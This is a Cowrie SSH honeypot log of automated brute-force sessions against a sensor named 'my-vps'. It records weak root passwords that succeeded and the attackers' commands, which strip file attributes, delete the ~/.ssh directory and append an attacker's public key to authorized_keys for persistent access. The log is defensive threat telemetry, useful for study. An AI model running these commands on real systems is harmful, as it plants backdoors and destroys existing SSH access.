{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:02.909791Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.login.success","username":"root","password":"admin1234!","message":"login attempt [root/admin1234!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:03.312673Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:03.520372Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:03.521256Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:03.522138Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:03.613803Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:03.907707Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:22:03.908367Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.004252Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.005317Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":58782,"dst_ip":"1.2.3.4","dst_port":22,"session":"061b1b887072","protocol":"ssh","message":"New connection: 167.99.49.89:58782 (1.2.3.4:22) [session: 061b1b887072]","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.091479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.092387Z","src_ip":"167.99.49.89","session":"061b1b887072"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.180990Z","src_ip":"167.99.49.89","session":"061b1b887072"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:22:04.576831Z","src_ip":"167.99.49.89","session":"061b1b887072"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:05.667653Z","src_ip":"167.99.49.89","session":"061b1b887072"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":58792,"dst_ip":"1.2.3.4","dst_port":22,"session":"306dd37f758d","protocol":"ssh","message":"New connection: 167.99.49.89:58792 (1.2.3.4:22) [session: 306dd37f758d]","sensor":"my-vps","timestamp":"2025-08-26T13:22:05.764835Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:05.765569Z","src_ip":"167.99.49.89","session":"306dd37f758d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:05.862901Z","src_ip":"167.99.49.89","session":"306dd37f758d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:06.296215Z","src_ip":"167.99.49.89","session":"306dd37f758d"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:06.395667Z","src_ip":"167.99.49.89","session":"4741a12c09bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:06.396571Z","src_ip":"167.99.49.89","session":"306dd37f758d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38836,"dst_ip":"1.2.3.4","dst_port":22,"session":"f49a9929cca0","protocol":"ssh","message":"New connection: 212.227.235.229:38836 (1.2.3.4:22) [session: f49a9929cca0]","sensor":"my-vps","timestamp":"2025-08-26T13:22:08.326684Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:08.327376Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:08.568243Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.login.success","username":"root","password":"debian","message":"login attempt [root/debian] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:09.572368Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:10.074762Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:10.075522Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:10.076975Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:10.318767Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:10.910013Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:22:10.910831Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:22:11.153896Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:11.154876Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39926,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88bd791390a","protocol":"ssh","message":"New connection: 212.227.235.229:39926 (1.2.3.4:22) [session: e88bd791390a]","sensor":"my-vps","timestamp":"2025-08-26T13:22:11.394104Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:11.395015Z","src_ip":"212.227.235.229","session":"e88bd791390a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:11.635758Z","src_ip":"212.227.235.229","session":"e88bd791390a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:22:12.640888Z","src_ip":"212.227.235.229","session":"e88bd791390a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:13.883895Z","src_ip":"212.227.235.229","session":"e88bd791390a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40994,"dst_ip":"1.2.3.4","dst_port":22,"session":"858beb3ea38f","protocol":"ssh","message":"New connection: 212.227.235.229:40994 (1.2.3.4:22) [session: 858beb3ea38f]","sensor":"my-vps","timestamp":"2025-08-26T13:22:14.127465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:14.128243Z","src_ip":"212.227.235.229","session":"858beb3ea38f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:14.371301Z","src_ip":"212.227.235.229","session":"858beb3ea38f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:15.386291Z","src_ip":"212.227.235.229","session":"858beb3ea38f"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:15.629146Z","src_ip":"212.227.235.229","session":"f49a9929cca0"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:15.631988Z","src_ip":"212.227.235.229","session":"858beb3ea38f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46456,"dst_ip":"1.2.3.4","dst_port":22,"session":"03caf7ba5e6c","protocol":"ssh","message":"New connection: 212.227.235.229:46456 (1.2.3.4:22) [session: 03caf7ba5e6c]","sensor":"my-vps","timestamp":"2025-08-26T13:22:28.621779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:22:28.622541Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:22:28.839868Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Asdf1234!@#$","message":"login attempt [root/Asdf1234!@#$] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:22:29.740860Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:30.232200Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:30.232925Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:22:30.234199Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:22:30.455357Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:22:30.927915Z","src_ip":"212.227.235.229","session":"03caf7ba5e6c"}
